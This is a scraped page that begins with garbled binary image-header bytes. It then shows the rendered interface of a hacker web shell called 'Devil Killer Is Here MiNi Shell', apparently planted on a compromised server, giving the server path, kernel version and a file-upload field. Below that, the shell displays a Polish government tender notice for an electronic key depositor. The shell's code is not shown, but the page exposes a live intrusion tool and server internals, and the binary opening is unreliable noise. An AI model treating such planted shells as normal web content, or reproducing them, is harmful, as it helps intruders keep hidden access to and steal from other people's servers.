JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211109/0026336701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa wraz z montażem elektronicznego depozytora kluczy z panelem sterującym wraz z wyposażeniem, oprogramowaniem, montażem i wdrożeniem całego systemu i modułem RPC” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Wodne Wody Polskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 368302575</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żelazna 59a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-848</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 777 49 94</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">32 777 49 99</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gliwice@wody.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.wody.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa Osoba Prawna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa wraz z montażem elektronicznego depozytora kluczy z panelem sterującym wraz z wyposażeniem, oprogramowaniem, montażem i wdrożeniem całego systemu i modułem RPC” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-11482f40-415d-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00263367</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00010273/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.34 Zakup elektronicznych depozytorów kluczy na potrzeby PGW WP KZGW</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-11482f40-415d-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Za pośrednictwem Platformy<br/>Zakupowej- zwanej dalej „Platformą” – pod adresem: https://przetargi.wody.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z<br/>art. 61 ust. 1 ustawy Pzp, z – komunikacja między Zamawiającym a Wykonawcami odbywa się w<br/>formie elektronicznej, za pośrednictwem Platformy Zakupowej – zwanej dalej „Platformą” :<br/>https://przetargi.wody.gov.pl/. Korzystanie z Platformy jest nieodpłatne. Instrukcja korzystania z<br/>Platformy znajduje się pod adresem: www.przetargi.wody.gov.pl w zakładce: Instrukcja dla<br/>Wykonawców. Korzystanie z Platformy nie wymaga zarejestrowania konta na Platformie. Dokumenty<br/>związane z postępowaniem Zamawiający zamieszcza na Platformie w zakładce z przedmiotowym<br/>postępowaniem. Celem skomunikowania się z Zamawiającym (z wyłączeniem złożenia oferty oraz<br/>dokumentów lub oświadczeń składanych razem z ofertą, których sposób złożenia został opisany w pkt<br/>14.1 – 14.6 „SWZ”, Wykonawca korzysta z zakładki „Zapytaj”. Zakładka ta służy również<br/>Zamawiającemu do komunikacji z Wykonawcami. Wszelkie wyjaśnienia, modyfikacje treści SWZ oraz<br/>inne informacje związane z niniejszym postępowaniem Zamawiający będzie zamieszczał wyłącznie<br/>poprzez Platformę. Za datę wpływu wszelkiej korespondencji do Zamawiającego, w tym złożenia oferty<br/>oraz dokumentów lub oświadczeń składanych razem z ofertą, uważa się datę wczytania<br/>korespondencji na Platformie. Zamawiający zaleca sporządzenie korespondencji w następujących<br/>formatach: .doc., .docx, .rtf, .pdf, .xls. Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>Platformy wynosi 150 MB.11. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania<br/>dokumentów lub oświadczeń składane są przez Wykonawcę za pośrednictwem Platformy jako<br/>załączniki. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań<br/>dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. Dokumenty<br/>lub oświadczenia, o których mowa w SWZ, są to oryginalne dokumenty lub oświadczenia w postaci<br/>elektronicznej, tj. w postaci dokumentu elektronicznego. Cyfrowe odwzorowania dokumentu lub<br/>oświadczenia, o których mowa w SWZ, są to cyfrowe odwzorowania dokumentów lub oświadczeń<br/>sporządzonych w postaci papierowej poświadczone za zgodność z oryginałem. Poświadczenia za<br/>elektronicznej, tj. kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem<br/>osobistym. Wykonawca składa ofertę wyłącznie za pośrednictwem Platformy. Oferta sporządzana jest<br/>w języku polskim, z zachowaniem postaci elektronicznej i podpisana kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym. Sposób złożenia oferty, w tym<br/>zaszyfrowania oferty, opisany został w Instrukcji oferenta dostępnej na Platformie. Ofertę należy złożyć<br/>w oryginale. Wykonawca, nie później niż wraz z przekazaniem tych informacji, ma prawo zastrzec<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej<br/>konkurencji. W przypadku zastrzegania informacji stanowiących tajemnicę przedsiębiorstwa.<br/>Wykonawca jest zobowiązany przekazać je w wydzielonym (odrębnym) pliku (podpisanym<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym) i oznaczyć je<br/>podczas składania oferty w Platformie opcją „Tajemnica przedsiębiorstwa”.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://przetargi.wody.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca przetwarzania danych osobowych.<br/>Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27<br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i<br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję,<br/>że:<br/>a) kontakt z Inspektorem ochrony danych w PGW WP możliwy jest pod adresem e-mail:<br/>iod@wody.gov.pl;<br/>b) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego oznaczonego numerem<br/>postępowania GL.ROZ.2810.93.2021.MJ prowadzonym na podstawie przepisów ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych;<br/>c) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych;<br/>d) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy z dnia 11 września<br/>2019 r. Prawo zamówień publicznych, przez okres 4 lat licząc od końca roku kalendarzowego, w<br/>którym zakończono postępowanie o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;<br/>e) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych;<br/>f) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO<br/>g) posiada Pani/Pan:<br/>* na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>h) administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Wodne Wody Polskie<br/>z siedzibą w Warszawie przy ul. Żelaznej 59A, 00-848 Warszawa, REGON: 368302575, NIP: 527-282-<br/>56-16;<br/>* na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych<br/>(skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym<br/>z przepisami ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);<br/>* na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu ochrony<br/>praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego);<br/>* prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo,<br/>że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO<br/>i) nie przysługuje Państwu:<br/>* w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>* prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>* na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GL.ROZ.2810.93.2021.MJ</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje dostawę wraz z montażem elektronicznego depozytora kluczy z panelem sterującym wraz z wyposażeniem, oprogramowaniem, montażem i wdrożeniem całego systemu i modułem RPC”<br/>Szczegółowy opis przedmiotu zamówienia, został określony w Załączniku Nr 1 do SWZ tj. Opis przedmiotu zamówienia oraz w Załączniku Nr 3 do SWZ tj. Wzór umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44421721-7 - Kasety depozytowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">P = Pc + Pg<br/>gdzie:<br/>P - łączna liczba punktów przyznanych badanej ofercie<br/>Pc - liczba punktów w kryterium „cena brutto&#34;<br/>Pg - liczba punktów w kryterium „okres gwarancji&#34;.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Posiadanie wiedzy i doświadczenia:<br/><br/>Określenie warunku:<br/> Wykonawca spełni warunek udziału w postępowaniu, zdolności technicznej lub zawodowej, jeżeli wykaże, że wykonał nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 dostawę depozytora kluczy o wartości min. 10 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia Wykonawcy z udziału w<br/>postępowaniu:<br/>1. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu o którym mowa w art.<br/>125 ust. 1 ustawy z dnia 11 września 2019 r. - Prawo<br/>zamówień publicznych, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez zamawiającego, zgodnego ze wzorem stanowiącym Załącznik<br/>nr 7 do SWZ.<br/>2. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do<br/>rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na<br/>podstawie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>3. oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu<br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który<br/>złożył odrębną ofertę, albo<br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz dostaw wykonanych, a w przypadku świadczeń okresowych lub<br/>ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a<br/>jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów na rzecz których dostawy te zostały wykonane o treści zgodnej<br/>z treścią Załącznika nr 8 do SWZ, oraz załączeniem dowodów określających, czy te dostawy zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w<br/>przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy. Jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw, wykonywanych<br/>wspólnie z innymi wykonawcami, składany wykaz powinien dotyczyć dostaw, w których wykonaniu<br/>wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych,<br/>w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>Treść zawarta w wykazie musi potwierdzać spełnienie warunku, o którym mowa w punkcie 7.2.4.1 niniejszej SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia lub dokumenty składane razem z ofertą:<br/>1) dokumenty potwierdzające uprawnienie do podpisania oferty oraz do podpisania lub<br/>poświadczenia za zgodność z oryginałem składanych oświadczeń lub dokumentów. Jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji dokumentem właściwym jest odpis<br/>lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru lub dokumenty na podstawie których dokonuje się<br/>wpisu do właściwego rejestru lub ewidencji, np. uchwała właściwego organu Wykonawcy;<br/>2) pełnomocnictwo, w przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty<br/>podpisuje pełnomocnik;<br/>3) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu, zgodne w treści z Załącznikiem nr 4 do SWZ, aktualne na dzień składania<br/>ofert, celem potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania na<br/>podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz spełnia warunki udziału w<br/>postępowaniu określone w SWZ. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie.<br/>4) Oświadczenie, zgodne w treści z Załącznikiem Nr 5 do SWZ, aktualne na dzień składania<br/>ofert, dotyczące innych podmiotów, na których zasoby powołuje się Wykonawca, celem<br/>wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim<br/>Wykonawca powołuje się na ich zasoby, warunków udziału w postępowaniu.<br/>5) dowód potwierdzający, że Wykonawca realizując zamówienie będzie dysponował<br/>niezbędnymi zasobami innych podmiotów, który stanowi w szczególności zobowiązanie tych<br/>podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienia, będzie dysponował niezbędnymi zasobami tych podmiotów. Wzór zobowiązania<br/>podmiotu trzeciego stanowi Załącznik Nr 5 do SWZ. Zobowiązanie podmiotu udostępniającego<br/>zasoby, potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby<br/>gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności 